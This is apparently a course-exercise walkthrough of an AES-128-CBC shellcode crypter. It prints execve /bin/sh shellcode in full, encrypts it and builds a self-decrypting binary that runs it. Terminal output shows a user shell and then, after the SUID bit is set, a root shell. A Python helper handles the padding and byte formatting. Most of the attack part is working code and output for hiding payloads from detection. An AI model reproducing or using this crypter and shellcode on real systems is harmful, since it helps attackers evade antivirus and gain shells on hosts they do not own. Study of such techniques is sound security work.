In this part we’ll use two programs: the encrypter, which encrypts the plaintext payload, and the self-decrypting binary, which carries the encrypted evil payload.
Compile encrypter
First, compile the encrypter using the Bash script placed on my Github page for SLAE. The script includes the flags to allow stack execution and to link against the OpenSSL libraries.
The payload is the execve shellcode, which is run once the correct password has been entered.
$ ../compile_crypter.sh aes-128-cbc_enc
[+] Compiling ...
[+] Done!
$ echo -ne "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" > execve
$ echo -ne "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" | ndisasm -u -
00000000 31C0 xor eax,eax
00000002 31DB xor ebx,ebx
00000004 31C9 xor ecx,ecx
00000006 31D2 xor edx,edx
00000008 50 push eax
00000009 686E2F7368 push dword 0x68732f6e
0000000E 682F2F6269 push dword 0x69622f2f
00000013 682F2F2F2F push dword 0x2f2f2f2f
00000018 89E3 mov ebx,esp
0000001A 50 push eax
0000001B 89E2 mov edx,esp
0000001D 53 push ebx
0000001E 89E1 mov ecx,esp
00000020 B00B mov al,0xb
00000022 CD80 int 0x80
Run the encrypter and use the payload
$ ./aes-128-cbc_enc execve
Enter password to encrypt:
ORIGINAL:
Oneliner:
"\x31\xC0\x31\xDB\x31\xC9\x31\xD2\x50\x68\x6E\x2F\x73\x68\x68\x2F\x2F\x62\x69\x68\x2F\x2F\x2F\x2F\x89\xE3\x50\x89\xE2\x53\x89\xE1\xB0\x0B\xCD\x80";
16-byte newline delimiter:
"\x31\xC0\x31\xDB\x31\xC9\x31\xD2\x50\x68\x6E\x2F\x73\x68\x68\x2F"\
"\x2F\x62\x69\x68\x2F\x2F\x2F\x2F\x89\xE3\x50\x89\xE2\x53\x89\xE1"\
"\xB0\x0B\xCD\x80";
ENCRYPTED:
Oneliner:
"\xAE\x23\x73\x7D\xB5\x33\xAC\xB8\xC0\x2A\x3A\x8A\x7A\xFE\x4D\xBE\xF7\x23\x7B\xBC\x3B\x4C\x2F\xE6\x3F\x04\x60\xCA\xBA\xF6\xEC\x43\xE7\x39\xCA\x91\xF8\xBF\x08\x1C\x44\x6F\x7B\x1B\xD3\xB0\xB8\xC5";
16-byte newline delimiter:
"\xAE\x23\x73\x7D\xB5\x33\xAC\xB8\xC0\x2A\x3A\x8A\x7A\xFE\x4D\xBE"\
"\xF7\x23\x7B\xBC\x3B\x4C\x2F\xE6\x3F\x04\x60\xCA\xBA\xF6\xEC\x43"\
"\xE7\x39\xCA\x91\xF8\xBF\x08\x1C\x44\x6F\x7B\x1B\xD3\xB0\xB8\xC5";
Having run the encrypter with the password “HODORHODORHODOR1234”, we now have an encrypted variant of the execve shellcode, which we’ll use later on.
Run the decrypter and execute the payload
First, we compile the decrypter with the encrypted payload we just generated embedded in it. The password is read without echoing it to the terminal and is then used for decryption.
$ vim hodor-decrypt-run.c
$ ../../compile_crypter.sh hodor-decrypt-run
[+] Compiling ...
[+] Done!
$ ./hodor-decrypt-run
Enter password to decrypt:
ENCRYPTED:
Oneliner:
"\xAE\x23\x73\x7D\xB5\x33\xAC\xB8\xC0\x2A\x3A\x8A\x7A\xFE\x4D\xBE\xF7\x23\x7B\xBC\x3B\x4C\x2F\xE6\x3F\x04\x60\xCA\xBA\xF6\xEC\x43\xE7\x39\xCA\x91\xF8\xBF\x08\x1C\x44\x6F\x7B\x1B\xD3\xB0\xB8\xC5";
16-byte newline delimiter:
"\xAE\x23\x73\x7D\xB5\x33\xAC\xB8\xC0\x2A\x3A\x8A\x7A\xFE\x4D\xBE"\
"\xF7\x23\x7B\xBC\x3B\x4C\x2F\xE6\x3F\x04\x60\xCA\xBA\xF6\xEC\x43"\
"\xE7\x39\xCA\x91\xF8\xBF\x08\x1C\x44\x6F\x7B\x1B\xD3\xB0\xB8\xC5";
DECRYPTED:
Oneliner:
"\x31\xC0\x31\xDB\x31\xC9\x31\xD2\x50\x68\x6E\x2F\x73\x68\x68\x2F\x2F\x62\x69\x68\x2F\x2F\x2F\x2F\x89\xE3\x50\x89\xE2\x53\x89\xE1\xB0\x0B\xCD\x80\x69\x01";
16-byte newline delimiter:
"\x31\xC0\x31\xDB\x31\xC9\x31\xD2\x50\x68\x6E\x2F\x73\x68\x68\x2F"\
"\x2F\x62\x69\x68\x2F\x2F\x2F\x2F\x89\xE3\x50\x89\xE2\x53\x89\xE1"\
"\xB0\x0B\xCD\x80\x69\x01";
Running shellcode...
$ id
uid=1000(vbox) gid=1000(vbox) groups=1000(vbox),7(lp),27(sudo),100(users),999(vboxsf)
$
Result: running a shell!
It isn’t perfect: the decrypted shellcode carries two extra bytes (\x69\x01) after the 36 bytes of the original. This is caused by the padding and could cause issues. Of the payloads and passwords I’ve been testing, I didn’t have any trouble running those using the decrypter.
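As an added example (not the post's own crypter code), the bookkeeping around the two runs above in Python: the PKCS#7 padding that turns the 36-byte execve payload into the 48-byte ciphertext shown, the two C-string layouts the crypter prints, and a check that flags leftover bytes such as the \x69\x01 in the decrypted output. The execve bytes are the ones from the post; the function names are my own.

```python
from typing import Tuple

BLOCK = 16  # AES block size; AES-128-CBC pads plaintext to a multiple of it

# The execve shellcode from the post (36 bytes), used as sample input here.
EXECVE = bytes.fromhex(
    "31c031db31c931d25068" "6e2f7368682f2f6269"
    "682f2f2f2f89e35089e25389e1" "b00bcd80"
)

def pkcs7_pad(data: bytes) -> bytes:
    """Append PKCS#7 padding: 36 payload bytes become 48 (three blocks)."""
    n = BLOCK - len(data) % BLOCK  # always 1..16, so an aligned input still grows
    return data + bytes([n]) * n

def pkcs7_unpad(data: bytes) -> bytes:
    """Strip PKCS#7 padding, refusing malformed input instead of guessing."""
    if not data or len(data) % BLOCK:
        raise ValueError("length is not a whole number of blocks")
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("invalid padding")
    return data[:-n]

def to_c_string(data: bytes, per_line: int = 0) -> str:
    """Render bytes the way the crypter prints them: per_line=0 gives the
    'Oneliner', per_line=16 the '16-byte newline delimiter' layout with
    backslash line continuations."""
    def esc(chunk: bytes) -> str:
        return '"' + "".join(f"\\x{b:02X}" for b in chunk) + '"'
    if per_line <= 0:
        return esc(data) + ";"
    lines = [esc(data[i:i + per_line]) for i in range(0, len(data), per_line)]
    return "\\\n".join(lines) + ";"

def check_decrypted(decrypted: bytes, original: bytes) -> Tuple[bool, bytes]:
    """Compare the decrypter's output with the original payload and return
    (prefix matches?, trailing bytes), so leftover padding is spotted
    before the buffer is executed."""
    matches = decrypted[: len(original)] == original
    return matches, decrypted[len(original):]

if __name__ == "__main__":
    print(f"{len(EXECVE)} bytes -> {len(pkcs7_pad(EXECVE))} bytes after padding")
    print(to_c_string(EXECVE))
    print(to_c_string(EXECVE, 16))
    print(check_decrypted(EXECVE + b"\x69\x01", EXECVE))
```

For this particular payload the two trailing bytes are never reached, because a successful execve does not return; a payload that falls through its last instruction would execute them.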
Setting SUID
Let’s add an extra security issue: the SUID bit on the executable. Of course, it’s very unlikely anyone in real life would set the SUID bit on a malicious payload. Still, we try it anyway and check the result: we become root.
$ sudo chown root hodor-decrypt-run
$ sudo chmod +s hodor-decrypt-run
$ ls -l hodor-decrypt-run
-rwsrwsr-x 1 root vbox 7664 Jan 3 22:59 hodor-decrypt-run
$ ./hodor-decrypt-run
Enter password to decrypt:
ENCRYPTED:
Oneliner:
"\xAE\x23\x73\x7D\xB5\x33\xAC\xB8\xC0\x2A\x3A\x8A\x7A\xFE\x4D\xBE\xF7\x23\x7B\xBC\x3B\x4C\x2F\xE6\x3F\x04\x60\xCA\xBA\xF6\xEC\x43\xE7\x39\xCA\x91\xF8\xBF\x08\x1C\x44\x6F\x7B\x1B\xD3\xB0\xB8\xC5";
16-byte newline delimiter:
"\xAE\x23\x73\x7D\xB5\x33\xAC\xB8\xC0\x2A\x3A\x8A\x7A\xFE\x4D\xBE"\
"\xF7\x23\x7B\xBC\x3B\x4C\x2F\xE6\x3F\x04\x60\xCA\xBA\xF6\xEC\x43"\
"\xE7\x39\xCA\x91\xF8\xBF\x08\x1C\x44\x6F\x7B\x1B\xD3\xB0\xB8\xC5";
DECRYPTED:
Oneliner:
"\x31\xC0\x31\xDB\x31\xC9\x31\xD2\x50\x68\x6E\x2F\x73\x68\x68\x2F\x2F\x62\x69\x68\x2F\x2F\x2F\x2F\x89\xE3\x50\x89\xE2\x53\x89\xE1\xB0\x0B\xCD\x80\x69\x01";
16-byte newline delimiter:
"\x31\xC0\x31\xDB\x31\xC9\x31\xD2\x50\x68\x6E\x2F\x73\x68\x68\x2F"\
"\x2F\x62\x69\x68\x2F\x2F\x2F\x2F\x89\xE3\x50\x89\xE2\x53\x89\xE1"\
"\xB0\x0B\xCD\x80\x69\x01";
Running shellcode...
# id
uid=1000(vbox) gid=1000(vbox) euid=0(root) groups=0(root),7(lp),27(sudo),100(users),999(vboxsf),1000(vbox)
# whoami
root
#